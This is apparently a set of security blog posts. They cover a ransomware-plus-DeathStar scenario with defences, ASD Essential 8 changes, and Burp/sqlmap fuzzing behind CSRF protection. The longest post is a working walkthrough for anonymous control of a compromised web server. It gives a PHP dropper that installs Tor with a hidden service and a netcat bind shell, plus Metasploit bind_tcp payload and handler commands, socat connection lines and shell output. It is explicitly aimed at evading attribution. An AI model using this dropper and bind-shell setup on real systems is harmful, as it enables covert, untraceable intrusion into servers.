The End is Nigh?

We are not usually in the business of making bold predictions about future developments in cyber security. But recent internal discussions about WannaCry and Petya/Nyetya have got us all thinking about an entirely plausible and frankly terrifying possibility for where crypto malware could go next.

Here’s the short version:
DeathStar + basic crypto malware variant = complete encryption of the entire AD environment.

DeathStar is an extension to the Empire post-exploitation framework that was released by byt3bl33d3r in May 2017. It builds on previous tools like BloodHound to identify and automate privilege escalation within Active Directory. Basically, “push button, receive domain admin”.

DeathStar (and BloodHound) don’t rely on exploiting any actual vulnerabilities. Rather DeathStar leverages Active Directory configuration and allocation of privilege in order to find and exploit a path of domain joined systems that can be travelled, one hop at a time, in order to eventually obtain DA privileges. The BloodHound github page probably explains this approach most succinctly:
“BloodHound uses graph theory to reveal hidden relationships and attack paths in an Active Directory environment.”

Our predicted scenario plays out something like this:
1. Despite your organisation’s best efforts with security education and awareness, a low privileged user opens a malicious executable email attachment.
2. The attachment first runs DeathStar, which eventually obtains domain admin privileges.
3. Once DA has been obtained, the payload reaches out to every domain-joined Windows system and executes a crypto malware payload, as DA, on every host simultaneously.

Taking this one step further…
Couple this attack with a basic password spraying attack against Remote Desktop Services or Citrix  (or even OWA followed up with Ruler) and you remove the need for any phishing or other user interaction. One minute you’re fine – the next minute every machine on your AD has crypto malware.

So what can be done?

  1. Excellent, frequent, offline and offsite backups. Definitely NOT on local, online, domain-joined backup servers.
  2. Proactively test your Active Directory with tools like Bloodhound and DeathStar. If you can prevent these tools from achieving DA through derivative administrator relationships, chances are good that the predicted malware won’t be able to either.
  3. Use cloud-based / SaaS services where possible.
  4. Follow ‘best practice’ advice like the Top 35 / Essential 8 provided by ASD. Specifically: patch OS and applications, implement application whitelisting, use 2FA for all remote access (including OWA), limit the allocation of administrative rights, and monitor the shit out of your environment.

If this prediction eventuates it could have staggering consequences for individual organisations and possibly for the global economy. We don’t want this to happen, but it just seems like the next logical step in the evolution of crypto malware. Hopefully by highlighting the possibility we can get ahead of the curve before the risk is realised.

Essential info on the “Essential 8”

A few days ago the Australian Signals Directorate released the new version of their document Strategies to Mitigate Cyber Security Incidents. This is the third version of this excellent guide and there are a number of obvious changes from the previous version in 2014. This year (unlike the 2014 release) ASD have chosen not to provide a summary of the key changes, so I did a quick side-by-side comparison. This post summarises the changes.

The obvious changes

There are three significant changes that have been made to this version of the document:

  1. The Top 4 is still around (and mostly the same), but now we also have the Essential 8
  2. The previous “Top 35” list of strategies is now grouped into strategies for: prevention of malware delivery and execution, limiting the extent of cyber security incidents, detecting cyber security incidents, recovering data and system availability, and preventing malicious insiders.
  3. The title has changed. The 2014 release was titled “Strategies to Mitigate Targeted Cyber Intrusions” – the new version is “Strategies to Mitigate Cyber Security Incidents”

My take on these high level changes is that the ASD seems to be aiming for the guidelines to be more widely applicable. Instead of just talking about targeted attacks, the advice is now more relevant to a wider range of cyber security incidents.
With a more cynical hat on, perhaps they are also coming to accept that no amount of guidance is going to be truly effective in preventing a targeted cyber intrusion from a well-resourced adversary.

What’s gone

The following items from the Top 35 list no longer seem to be present:

  • 19 – Web domain whitelisting for all domains
  • 32 – Block attempts to access websites by their IP address
  • 34 – Gateway blacklisting

These seem to be fair exclusions. Web domain whitelisting is a nice idea in theory, but invasive and difficult to maintain. Blocking attempts to access websites by IP address never really seemed like it would make much difference – getting a DNS record for a C&C server is hardly a difficult task.

What’s changed

The following strategies have been significantly changed, updated or merged:

  • The previous guidance / intent of “Workstation inspection of Microsoft Office files” (29) has been transformed into a new (better) strategy for protecting against malicious Office files – “Configure Microsoft Office macro settings”
  • The previous guidance for “Workstation and server configuration management” (21) has been given a more general heading of “Operating system hardening”. This new strategy also incorporates previous guidance for “Restrict access to Server Message Block (SMB) and NetBIOS” (27).
  • “Enforce a strong passphrase policy” (25) is now incorporated into a much broader “Protect authentication credentials”.
  • The verbosely-titled strategies “Centralised and time-synchronised logging of successful and failed computer events” (15) and “Centralised and time-synchronised logging of allowed and blocked network activity” (16) have been rolled up into “Continuous incident detection and response”
  • Elements of “Centralised and time-synchronised logging of successful and failed computer events” (15) have also made their way into the new strategy for “Endpoint detection and response software”.

These updates, changes and merges all seem to make a lot of sense. Personally, I would have taken this even further – I think there are more opportunities to reduce the overall number of strategies by rolling-up similar or related guidance. For example, in the strategies to prevent malware delivery and execution section we have “User application hardening” and “Configure Microsoft Office macro settings” – I would argue that the latter is a subset of the former.

What’s new

Perhaps the most interesting aspect of this year’s version of the document are the new entries to the list:

  • “Hunt to discover incidents” (Mitigation strategies to prevent malware delivery and execution). This is an excellent recommendation, and it is almost baffling that this wasn’t explicitly required in previous years.
  • “Personnel management” (Mitigation strategy specific to preventing malicious insiders)

And the following three new entries under “Mitigation strategies to recover data and system availability”:

  • “Daily backups”
  • “Business continuity and disaster recovery plans”
  • “System recovery capabilities”

These last three really underline ASD’s apparent change in thinking for this year’s release – instead of just being about ‘keeping the bad guys out’, this new guide better aligns to a ‘Prevent – Detect – Respond – Recover’ incident response approach.

Closing thoughts

  1. It is great that ASD produce this guide and make it publicly available. I believe that the guidance is sound and mostly I would agree with the assigned ratings for effectiveness, impact, cost, etc.
  2. I am not a huge fan of the new groupings for the strategies. I think that this may be confusing for casual readers and non-industry types. I am concerned that a customer might work their way down the “prevent” list from top to bottom, while completely ignoring the essential strategies from “limit” and “detect”. It would be nice for ASD to release the recommendations in a format that facilitated sorting by different attributes.
  3. It is good to see the guidance updated in a way that addresses changes to the threat landscape, changes to current attack patterns, changes to defensive technologies (and technology capabilities).

Fuzzing and Sqlmap inside CSRF-protected locations (Part 2)

– @dave_au

This is part 2 of a post on fuzzing and sqlmap’ing inside web applications with CSRF protection. In part 1 I provided a walkthough for setting up a Session Handling Rule and macro in Burp suite for use with Burp’s Intruder. In this part, I will walkthrough a slightly different scenario where we use Burp as a CSRF-protection-bypass harness for sqlmap.

Sqlmap inside CSRF

A lot of the process from part 1 of the post is common to part 2. I will only run through the key differences.

Again, you’ll need to define a Session Handling Rule, containing a macro sequence that Burp will use to login to the application, and navigate to the page that you need.

The first real difference is in the definition of scope for the session handling rule. Instead of setting the scope to “Intruder” and “Include all URLs”, you’ll need to set the scope to be “Proxy” and a custom scope containing the URL that you are going to be sqlmapping.

screenshot11

There is a note to “use with caution” on the tool selection for Proxy. It is not too hard to see why – if you scoped the rule too loosely for Proxy, each request could trigger a whole new session login. And then I guess the session login could trigger a session login, and then the universe would collapse into itself. Bad news. You have been warned.

Once the session handling rule is in place, find an in-scope request that you made previously, and construct it into a sqlmap command line.

screenshot12

screenshot13

In this example, I’m attempting an injection into a RESTful URL, so I’ve manually specified the injection point with “*”. I’ve included a cookie parameter that defines the required cookies, but the actual values of the cookies is irrelevant, since Burp will replace these based on the macro.
If it was a POST, you would need to include a similar –data parameter to sqlmap, where Burp would replace any CSRF tokens from hidden form fields. Finally, we have specified a proxy for sqlmap to use (Burp).

Running sqlmap, we start to see it doing it’s thing in the Burp Proxy window.

Screenshot a

That’s pretty much all there is to it.

One catch for the Session Handling Rule / macro configuration is that there isn’t a lot of evidence in the Burp tool (Intruder, Proxy, …) that anything is happening. If you are not getting the results that you would expect, the first thing to check is the Sessions Tracer, which can be found in the Session Handling Rules section. Clicking the “Open sessions tracer” button opens the Session Handling Tracer window. If a session handling rule is triggered, the actions for that rule will start to show up in the Tracer window. You can step through a macro, request by request, to see that everything is in order.

screenshot b

Conclusion

In this two part post, I’ve walked through setting up Burp Suite to do fuzzing inside CSRF-protected applications, both with Burp’s own Intruder tool and using an external tool (sqlmap).

Fuzzing and sqlmap inside CSRF-protected locations (Part 1)

– @dave_au

Hi all, David here. I was recently testing a web app for a client written in ASP.NET MVC. The developers are pretty switched on, and had used RequestValidation throughout the application in order to prevent CSRF. Further to this, in several locations, if there was a RequestValidation failure, they were destroying the current session and dropping the user back to the login form. Brutal.

I didn’t think that there would be any injection issues in the app, but I needed to test all the same and this presented an interesting challenge – how to fuzz or sqlmap on target parameters within the CSRF-protected pages of the application.

If I opted for a manual approach, the process would look like this:

  1. Login to the application
  2. Navigate to the page under test
  3. Switch Burp proxy to intercept
  4. Submit and intercept the request
  5. Alter the parameter under test in Burp, then release the request
  6. Observe results
  7. Goto 1

This would be incredibly slow and inefficient, and wouldn’t really provide a way of using external tools.

I scratched my head for a while and did some reading on Buby, Burp Extender and Sqlmap tamper scripting until I finally came across an article from Carstein at 128nops which led me to further reading by Dafydd on the Portswigger Web Security Blog. Turns out that Burp suite can do exactly what I needed, out of the box, so I thought I’d put together a step-by-step for how I solved the problem.

Fuzzing (with Intruder) inside CSRF

Note: Intruder has built-in recursive grep functionality that can be used in some circumstances to take the CSRF token from one response and use it in the following request (&c.)[1]. This wasn’t much good to me, since the session was being destroyed if CSRF validation failed.

In Burp terminology, you need to create a Session Handling Rule to make Intruder perform a sequence of actions (login, navigate to page under test) before each request.

Go to the “Options” tab, and select the “Sessions” sub-tab. “Session Handling Rules” is right at the top.

screenshot1

Click the “Add” button to create a new Session Handling Rule. The Session Handling Rule editor window opens. Give the rule a meaningful name, then click the “Add” button for “Rule Actions” and select “Run a macro” from the drop-down.

screenshot2

This opens the Session Handling Action Editor window…

screenshot3

In this window, click the “Add” button next to “Select macro:”. This opens the Macro Editor and Macro Recorder windows (shown a further on). Now that Burp is set up and waiting to record the sequence, switch over to your web browser. In a new window / session (making sure to delete any leftover session cookies), navigate to the login page, login, then navigate to the page within the application where you want to be doing fuzz testing. Once you are there, switch back over to Burp. The Macro Recorder should show the intercepted requests.

screenshot4

Select the requests that you want to use in the macro and click “OK”. This will close the Macro Recorder window.

screenshot5

In the Macro Editor window, give the macro a meaningful name and look through the “Cookies received”, “Derived Parameters” and “Preset Parameters” columns to check that Burp has analysed the sequence correctly. When you’re happy, you can test the macro out by clicking the “Test Macro” button. If everything looks alright, click “OK” to close the Macro Editor window.

screenshot6

Almost there.

Back in the Session Handling Action Editor window, you should be OK to leave the other options for updating parameters and cookies as-is. Click “OK” to exit out of here.

Now, back in the Session Handling Rule Editor window, you’ll see your macro listed in the Rule Actions…

screenshot7

Before you close this window, switch over to the “Scope” tab and alter the scope for the rule to be just for Intruder and “Include all URLs”. (If you want to be more specific, you could specify the URL that you wanted the rule to apply to, but I just put it in scope for all of Intruder, and remember to turn the rule off when I’m not using it. This becomes more important in Part 2 of this post.) Then close the Session Handling Rule Editor window.

screenshot8

Your session handling rule is now defined.

Next, go back over to Burp’s proxy and send the request that you want to fuzz over to Intruder in the usual way.

screenshot9

In Intruder’s “Position” tab, you’ll want to clear all of the injection points except for the one that you want to specifically fuzz test. Session cookies and any CSRF tokens (in cookies or hidden form fields) will be populated automatically by Intruder from the macro sequence.

screenshot10

Set your payloads and other options as required. If the application is sensitive to multiple concurrent sessions for the same user, you will need to reduce the number of threads to 1 in the “Options” tab.

Then start Intruder. You will almost certainly notice that Intruder runs slowly; this is to be expected when you consider that it is going through a new login sequence for each request.

To fuzz different parameters on the same page, just go back into “Positions” and choose the next target.

To fuzz parameters on a different page, you will probably need to go back into your Session Handling Rule and edit your macro (or define a new macro) that logs in and navigates to the new target page.

In part 2 of this post, I’ll step through a slightly different scenario where we use an external tool (sqlmap), proxied through Burp, with a Session Handling rule running on Burp’s Proxy.

Anonymous post-compromise control via Tor hidden services

Hi all, David here.  This post has been quite a long time coming.  The idea has been brewing in the back of my mind for a good six months and I’ve just been waiting until I had some spare cycles to write it up and post it.  Yay for Christmas and the holiday season!

I expect that this is going to be a relatively lengthy post.  If you can’t spare the time, see the TLDR at the bottom.

So, I can imagine certain scenarios where it would be highly desirable to remain anonymous when compromising and exerting post-compromise control over target systems on the Internet.  Setting aside any black-hat motivations I expect that law enforcement agencies and offensive cyber operations teams require effective anonymity at various times.  This led me to thinking about methods for post-compromise control of targets that are both:

a)      Useful, and
b)      Anonymous.

For the sake of simplicity, lets say that the target system is a web server on the Internet.  Pre-compromise activities (information gathering, application mapping, etc) and actual exploitation would be relatively easy to achieve with anonymity using the Tor anonymisation network.  However, once the system is compromised, your options for post-compromise command & control introduce some challenges to maintaining anonymity.

Broadly, the options that I can see for post-compromise control are:

  1. In-band control (within the HTTP or HTTPS service) – The most obvious example here would be to load a PHP shell onto the compromised system, and perform C&C through this.
  2. Out-of-band forward connection – You install a trojan service onto the compromised system, listening on a different unused network port (eg. Metasploit bind_tcp payloads).  This still lets you use Tor for C&C, but virtually every real world system will have some form of firewall in place which will prevent you from connecting to arbitrary listening ports.
  3. Out-of-band reverse connection – You install a trojan service onto the compromised system; the Trojan establishes an outbound connection to your C&C server (eg. Metasploit reverse_tcp and reverse_http payloads).  This is more likely to succeed against perimeter firewalls, but is a significant challenge to anonymity – you need to have a known IP address for the trojan to connect back to.

Option 1 isn’t a bad choice, but let’s be honest – web shells mostly suck.  They might be OK for rudimentary post-compromise activities, but I don’t think that they meet the primary requirement of being truly useful.  They don’t give you an interactive shell with job control and all of the nice stuff, let alone more advanced desirable features like port forwarding and application or network pivoting.

Option 2 is generally not practical due to pervasive firewalling, and Option 3 breaks the second primary requirement of maintaining anonymity.

The answer that I arrived at is to leverage Tor hidden services on the compromised host.

The assumed pre-requisites for this method of anonymous, useful, post-compromise control are as follows:

  1. You have already compromised the system, and you are able to upload and execute arbitrary code (doesn’t necessarily need to be privileged execution);
  2. The compromised system is able to establish an outbound connection to the Tor network.  This isn’t too much of a stretch; I’ve seen a lot of DMZ infrastructure and hosted websites that have more or less unrestricted egress access for grabbing automatic updates or to facilitate administration.

The steps go like this:

  1. Upload your required trojan or network service and bind it to an unused port on the localhost interface (bind_tcp).
  2. Upload a Tor client with a hidden services configuration and run it .  The client establishes a connection to the Tor network, and sets up the hidden service, redirecting to the trojan listener that you set up in step 1.
  3. From your workstation, establish a connection to the Tor network and connect to the published hidden service.  Egress becomes ingress and you are able to establish an out-of-band forward connection, with anonymity, straight through the target’s firewall.

Hidden Services diagram

The choice of network service that you install on the compromised host is limited only by your imagination.  Some options might include:

  • A netcat listener bound to a shell;
  • A customised SSH daemon;
  • A meterpreter payload ;
  • A SOCKS daemon, providing an application proxy pivot onto the target network;
  • An OpenVPN daemon, proving network layer pivot capability onto the target network.

One small obstacle that makes this process a little more difficult is the fact that a LOT of client applications don’t natively support connecting via SOCKS, or they implement SOCKS poorly in relation to name resolution.  In order to access a hidden service on Tor, the client needs to be able to use the SOCKS proxy server provided by the Tor client, and the client needs to defer name resolution to the SOCKS server.  To imbue non-SOCKS-enabled clients with SOCKS capability, you need to look to an additional tool like torify or socat.

The examples below show the process from end-to-end both for a Netcat shell listener, and also for a metasploit bind_tcp shell.  Both examples utilise socat to enable the client to connect to the published hidden service.

Example 1 – Netcat shell listener

Step 1 – Tor hidden service pre-configuration

Tor hidden services, identified by “.onion” pseudo-TLD addresses, are linked to a private key.  If you move the private key from one Tor client to another, the hidden service definition follows.  In order to know the hidden service address that you’ll be using for post-compromise control, it is necessary to generate the private key and matching hostname ahead of time.  So, we create a very simple torrc file and create a new private key and hostname…

david@GTFO:~$ 
david@GTFO:~$ cd torcontrol/
david@GTFO:~/torcontrol$ ls -l
total 1232
-rwxr-xr-x 1 david david 1254312 Dec 24 13:13 tor
-rw-rw-r-- 1 david david     141 Dec 24 13:14 torrc
david@GTFO:~/torcontrol$ cat torrc
SocksPort 9050
SocksListenAddress 127.0.0.1
#HiddenServiceDir /var/tmp/tor/
HiddenServiceDir ./hidden/
HiddenServicePort 2222 127.0.0.1:2222
david@GTFO:~/torcontrol$ ./tor -f ./torrc
Dec 24 13:16:45.497 [notice] Tor v0.2.2.37. This is experimental software. Do not rely on it for strong anonymity. (Running on Linux x86_64)
Dec 24 13:16:45.497 [notice] Initialized libevent version 2.0.16-stable using method epoll. Good.
Dec 24 13:16:45.498 [notice] Opening Socks listener on 127.0.0.1:9050
Dec 24 13:16:45.552 [notice] OpenSSL OpenSSL 1.0.1 14 Mar 2012 looks like version 0.9.8m or later; I will try SSL_OP to enable renegotiation
Dec 24 13:16:45.608 [warn] Please upgrade! This version of Tor (0.2.2.37) is obsolete, according to the directory authorities. Recommended versions are: 0.2.2.39,0.2.3.24-rc,0.2.3.25,0.2.4.5-alpha,0.2.4.6-alpha
Dec 24 13:16:45.794 [notice] We now have enough directory information to build circuits.
Dec 24 13:16:45.794 [notice] Bootstrapped 80%: Connecting to the Tor network.
Dec 24 13:16:47.087 [notice] Bootstrapped 85%: Finishing handshake with first hop.
Dec 24 13:16:49.129 [notice] Bootstrapped 90%: Establishing a Tor circuit.
Dec 24 13:16:51.813 [notice] Tor has successfully opened a circuit. Looks like client functionality is working.
Dec 24 13:16:51.813 [notice] Bootstrapped 100%: Done.
^CDec 24 13:16:59.010 [notice] Interrupt: exiting cleanly.
david@GTFO:~/torcontrol$ ls -l
total 1236
drwx------ 2 david david    4096 Dec 24 13:16 hidden
-rwxr-xr-x 1 david david 1254312 Dec 24 13:13 tor
-rw-rw-r-- 1 david david     141 Dec 24 13:14 torrc
david@GTFO:~/torcontrol$ cd hidden
david@GTFO:~/torcontrol/hidden$ ls -l
total 8
-rw------- 1 david david  23 Dec 24 13:16 hostname
-rw------- 1 david david 887 Dec 24 13:16 private_key
david@GTFO:~/torcontrol/hidden$ cat hostname
zcbvswdhpmb7mkgq.onion
david@GTFO:~/torcontrol/hidden$

Step 2 – Construct a payload to upload to the compromised system

This stage will vary from server to server, and depending on what service you want to run on the compromised system.  My target system is a Linux server, running Apache with PHP.  The payload bundle contains everything that will be required to establish the Tor hidden service, as well as my required trojan.

Caveat: I am not a coder.  This is a hideous hack in order to achieve my requirement.  I am certain that there are 100’s of more elegant ways of achieving the same net result.

Payload “dropper.php” follows:

<?php
$str = 'H4sICB3s11AAA3RvcgCMWwmYHFW1vplMkh6yJ5CwBEg0wOCDkAxJTBA124Ssk3GSQBCw0tNdPVNM
--snip--
pi6xDt9HxLYaXBDOH6QbsXS8/QtvoE3uQMUSAA==';
$handle = fopen("/tmp/tor.gz", "w+");
fwrite($handle,base64_decode($str));
fclose($handle);
shell_exec('gunzip /tmp/tor.gz');
shell_exec('chmod 755 /tmp/tor');

$str = 'SocksPort 9050
SocksListenAddress 127.0.0.1
DataDirectory /tmp/.tor
HiddenServiceDir /tmp/hidden/
HiddenServicePort 2222 127.0.0.1:2222
';
$handle = fopen("/tmp/torrc", "w+");
fwrite($handle,$str);
fclose($handle);
shell_exec('mkdir /tmp/hidden');
shell_exec('chmod 700 /tmp/hidden');

$str = 'zcbvswdhpmb7mkgq.onion';
$handle = fopen("/tmp/hidden/hostname", "w+");
fwrite($handle,$str);
fclose($handle);
shell_exec('chmod 600 /tmp/hidden/hostname');

$str = '-----BEGIN RSA PRIVATE KEY-----
MIICWwIBAAKBgQDB9xZuO4chidB4S4sdZZH7XRIj/7slR6NCxs9kIWnzA9pFF1aR
--snip--
MmaQ/2PM26I1EwSxqLi33RdrwBgPdTMODx3VGAxinA==
-----END RSA PRIVATE KEY-----';
$handle = fopen("/tmp/hidden/private_key", "w+");
fwrite($handle,$str);
fclose($handle);
shell_exec('chmod 600 /tmp/hidden/private_key');
system('/tmp/tor -f /tmp/torrc >/tmp/log 2>&1 &');
sleep(5);

$str = 'H4sICC/s11AAA25jAO18fXhU1bX3mckEJhicqFBRUY82FFASCaJCCBo+RvHKl0oqLUScZGaYKZOZ
--snip--
PPT/QlZ/+NZW7yD9Ib2UhQdfcJzwegbB25SF19lps3cu7P+9TrPvN+T4TN9BmsetijLbksFTZb5N
6f+dSOCNyIItWXmWeigTCe/tQfD+H9c9M+o8VgAA';
$handle = fopen("/tmp/nc.gz", "w+");
fwrite($handle,base64_decode($str));
fclose($handle);
shell_exec('gunzip /tmp/nc.gz');
shell_exec('chmod 755 /tmp/nc');
system('/tmp/nc -l -p 2222 -e /bin/sh >/dev/null 2>&1 &');
print("Done!");
?>

Step 3 – Upload the payload bundle to the web server

Using your Tor-enabled web browser, first check that Tor is active…

Screenshot1

Then navigate to the target system…

Screenshot2

And using the vulnerable file upload facility, upload your payload…

screenshot3

Step 4 – Execute your payload on the web server

There’s not too much to see here from the attacker’s perspective, so I’ve illustrated this with some behind-the-scenes information from the web server.  Here’s the situation before the upload:

root@ip-10-128-69-141:/var/www# ls -l
total 12
-rw-r--r-- 1 www-data www-data  66 2013-01-10 06:58 index.html
-rw-r--r-- 1 www-data www-data 358 2012-12-24 06:23 uploader.php
-rw-r--r-- 1 www-data www-data 332 2012-12-24 06:15 upload.html
root@ip-10-128-69-141:/var/www#

And the same listing after we’ve uploaded the payload:

root@ip-10-128-69-141:/var/www# ls -l
total 724
-rw-r--r-- 1 www-data www-data 722088 2013-01-10 07:03 dropper.php
-rw-r--r-- 1 www-data www-data     66 2013-01-10 06:58 index.html
-rw-r--r-- 1 www-data www-data    358 2012-12-24 06:23 uploader.php
-rw-r--r-- 1 www-data www-data    332 2012-12-24 06:15 upload.html
root@ip-10-128-69-141:/var/www#

Before we run the payload, this is what the system looks like:

root@ip-10-128-69-141:/var/www# ps -ef | grep www-data
www-data  1440   602  0 06:25 ?        00:00:00 /usr/sbin/apache2 -k start
www-data  1441   602  0 06:25 ?        00:00:00 /usr/sbin/apache2 -k start
www-data  1443   602  0 06:25 ?        00:00:00 /usr/sbin/apache2 -k start
www-data  1445   602  0 06:25 ?        00:00:00 /usr/sbin/apache2 -k start
www-data  1446   602  0 06:25 ?        00:00:00 /usr/sbin/apache2 -k start
www-data  1522   602  0 06:34 ?        00:00:00 /usr/sbin/apache2 -k start
www-data  1523   602  0 06:34 ?        00:00:00 /usr/sbin/apache2 -k start
www-data  1568   602  0 06:37 ?        00:00:00 /usr/sbin/apache2 -k start
root@ip-10-128-69-141:/var/www# ls -la /tmp
total 8
drwxrwxrwt  2 root root 4096 2013-01-10 07:07 .
drwxr-xr-x 21 root root 4096 2013-01-10 06:39 ..
root@ip-10-128-69-141:/var/www#

No unusual processes, and nothing fun in /tmp.
Then we run the payload container from the browser…

Screenshot4

…which unpacks our files and executes them, resulting in the following:

root@ip-10-128-69-141:/var/www# ls -la /tmp
total 1260
drwxrwxrwt  4 root     root        4096 2013-01-10 07:09 .
drwxr-xr-x 21 root     root        4096 2013-01-10 06:39 ..
drwx------  2 www-data www-data    4096 2013-01-10 07:08 hidden
-rw-r--r--  1 www-data www-data    4434 2013-01-10 07:09 log
-rwxr-xr-x  1 www-data www-data   22076 2013-01-10 07:08 nc
-rwxr-xr-x  1 www-data www-data 1230144 2013-01-10 07:08 tor
drwx------  2 www-data www-data    4096 2013-01-10 07:09 .tor
-rw-r--r--  1 www-data www-data     136 2013-01-10 07:08 torrc
root@ip-10-128-69-141:/var/www# ps -ef | grep www-data
www-data  1440   602  0 06:25 ?        00:00:00 /usr/sbin/apache2 -k start
www-data  1441   602  0 06:25 ?        00:00:00 /usr/sbin/apache2 -k start
www-data  1443   602  0 06:25 ?        00:00:00 /usr/sbin/apache2 -k start
www-data  1445   602  0 06:25 ?        00:00:00 /usr/sbin/apache2 -k start
www-data  1446   602  0 06:25 ?        00:00:00 /usr/sbin/apache2 -k start
www-data  1522   602  0 06:34 ?        00:00:00 /usr/sbin/apache2 -k start
www-data  1523   602  0 06:34 ?        00:00:00 /usr/sbin/apache2 -k start
www-data  1568   602  0 06:37 ?        00:00:00 /usr/sbin/apache2 -k start
www-data  1915     1  6 07:08 ?        00:00:04 /tmp/tor -f /tmp/torrc
www-data  1921     1  0 07:08 ?        00:00:00 /tmp/nc -l -p 2222 -e /bin/sh
root@ip-10-128-69-141:/var/www#

Step 5 – Connect to the hidden service

Finally, we are ready to connect to the hidden service to gain access to the trojan.  Allow a couple of minutes from when the payload is first run, as it can sometimes take a while for Tor to bootstrap itself, and for the hidden service to register in the Tor directory.

In shell #1, start up socat…

$ socat TCP4-LISTEN:2222 SOCKS4a:127.0.0.1:zcbvswdhpmb7mkgq.onion:2222,socksport=9050

Then, in shell #2, connect to the socat listener…

$ nc 127.0.0.1 2222
ls -la
total 760
drwxr-xr-x  4 root     www-data   4096 Jan 10 06:40 .
drwxr-xr-x 15 root     root       4096 Jun 29  2011 ..
-rw-r--r--  1 www-data www-data 722072 Jan 10 06:40 dropper.php
-rw-r--r--  1 www-data www-data     30 May 28  2012 index.html
-rw-r--r--  1 www-data www-data    332 Dec 24 06:15 upload.html
-rw-r--r--  1 www-data www-data    358 Dec 24 06:23 uploader.php
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
hostname
ip-10-128-69-141
/sbin/ifconfig -a
eth0      Link encap:Ethernet  HWaddr 12:31:40:00:46:63
          inet addr:10.128.69.141  Bcast:10.128.69.255  Mask:255.255.255.0
          inet6 addr: fe80::1031:40ff:fe00:4663/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:42289 errors:0 dropped:0 overruns:0 frame:0
          TX packets:29494 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:29078650 (29.0 MB)  TX bytes:8783815 (8.7 MB)
          Interrupt:246

lo        Link encap:Local Loopback
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:242 errors:0 dropped:0 overruns:0 frame:0
          TX packets:242 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:23980 (23.9 KB)  TX bytes:23980 (23.9 KB)
echo Giddyup\!
Giddyup!
^C
$

Example 2 – Metasploit bind shell

Step 1 – Tor hidden service pre-configuration

As above

Step 2 – Construct a payload to upload to the compromised system

Mostly as above.  Instead of the netcat binary, we need to build a staged metasploit bind shell payload, as follows…
root@GTFO:~/torcontrol# msfpayload linux/x86/shell/bind_tcp LPORT=2222 X > msfshell.bin
Created by msfpayload (http://www.metasploit.com).
Payload: linux/x86/shell/bind_tcp
 Length: 79
Options: {"LPORT"=>"2222"}
root@GTFO:~/torcontrol# ls -l msfshell.bin
-rw-r--r-- 1 root root 163 Jan 10 15:29 msfshell.bin
root@GTFO:~/torcontrol#

This then gets built into payload.php.

Step 3 – Upload the payload bundle to the web server

As above

Step 4 – Execute your payload on the web server

As above.  The filesystem objects and process listing will obviously be slightly different…

$ ps -ef | grep www-data
www-data  1440   602  0 06:25 ?        00:00:00 /usr/sbin/apache2 -k start
www-data  1441   602  0 06:25 ?        00:00:00 /usr/sbin/apache2 -k start
www-data  1443   602  0 06:25 ?        00:00:00 /usr/sbin/apache2 -k start
www-data  1445   602  0 06:25 ?        00:00:00 /usr/sbin/apache2 -k start
www-data  1446   602  0 06:25 ?        00:00:00 /usr/sbin/apache2 -k start
www-data  1522   602  0 06:34 ?        00:00:00 /usr/sbin/apache2 -k start
www-data  1523   602  0 06:34 ?        00:00:00 /usr/sbin/apache2 -k start
www-data  1568   602  0 06:37 ?        00:00:00 /usr/sbin/apache2 -k start
www-data  1915     1  0 07:08 ?        00:00:08 /tmp/tor -f /tmp/torrc
www-data  2031  2029  0 07:36 pts/0    00:00:00 /tmp/msfshell.bin
$ netstat -nap |grep 2222
tcp        0      0 0.0.0.0:2222            0.0.0.0:*               LISTEN      2031/msfshell.bin
$

Step 5 – Connect to the hidden service

In shell #1, again we start up socat…

$ socat TCP4-LISTEN:2222 SOCKS4a:127.0.0.1:zcbvswdhpmb7mkgq.onion:2222,socksport=9050

Then, in shell #2, we fire up msfconsole and point it at socat…

root@GTFO:~/Work/Metasploit_dev# msfconsole

Call trans opt: received. 2-19-98 13:24:18 REC:Loc

     Trace program: running

           wake up, Neo...
        the matrix has you
      follow the white rabbit.

          knock, knock, Neo.

                        (`.         ,-,
                        ` `.    ,;' /
                         `.  ,'/ .'
                          `. X /.'
                .-;--''--.._` ` (
              .'            /   `
             ,           ` '   Q '
             ,         ,   `._    \
          ,.|         '     `-.;_'
          :  . `  ;    `  ` --,.._;
           ' `    ,   )   .'
              `._ ,  '   /_
                 ; ,''-,;' ``-
                  ``-..__``--`


       =[ metasploit v4.6.0-dev [core:4.6 api:1.0]
+ -- --=[ 1017 exploits - 566 auxiliary - 167 post
+ -- --=[ 262 payloads - 28 encoders - 8 nops

msf > use exploit/multi/handler
msf  exploit(handler) > set PAYLOAD linux/x86/shell/bind_tcp
PAYLOAD => linux/x86/shell/bind_tcp
msf  exploit(handler) > set LPORT 2222
LPORT => 2222
msf  exploit(handler) > set RHOST 192.168.1.112
RHOST => 192.168.1.112
msf  exploit(handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (linux/x86/shell/bind_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LPORT  2222             yes       The listen port
   RHOST  192.168.1.112    no        The target address


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf  exploit(handler) > exploit

[*] Started bind handler
[*] Sending stage (36 bytes) to 192.168.1.112
[*] Starting the payload handler...
[*] Command shell session 1 opened (192.168.1.112:56788 -> 192.168.1.112:2222) at 2013-01-10 15:56:26 +0800

ls -la
total 1264
drwxrwxrwt  4 root     root        4096 Jan 10 07:39 .
drwxr-xr-x 21 root     root        4096 Jan 10 06:39 ..
drwx------  2 www-data www-data    4096 Jan 10 07:50 .tor
drwx------  2 www-data www-data    4096 Jan 10 07:08 hidden
-rw-r--r--  1 www-data www-data    4434 Jan 10 07:09 log
-rwxr-xr-x  1 www-data www-data     163 Jan 10 07:32 msfshell.bin
-rwxr-xr-x  1 www-data www-data   22076 Jan 10 07:08 nc
-rwxr-xr-x  1 www-data www-data 1230144 Jan 10 07:08 tor
-rw-r--r--  1 www-data www-data     136 Jan 10 07:08 torrc
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
hostname
ip-10-128-69-141
exit

[*] 192.168.1.112 - Command shell session 1 closed.  Reason: Died from EOFError
msf  exploit(handler) >

Last Notes:

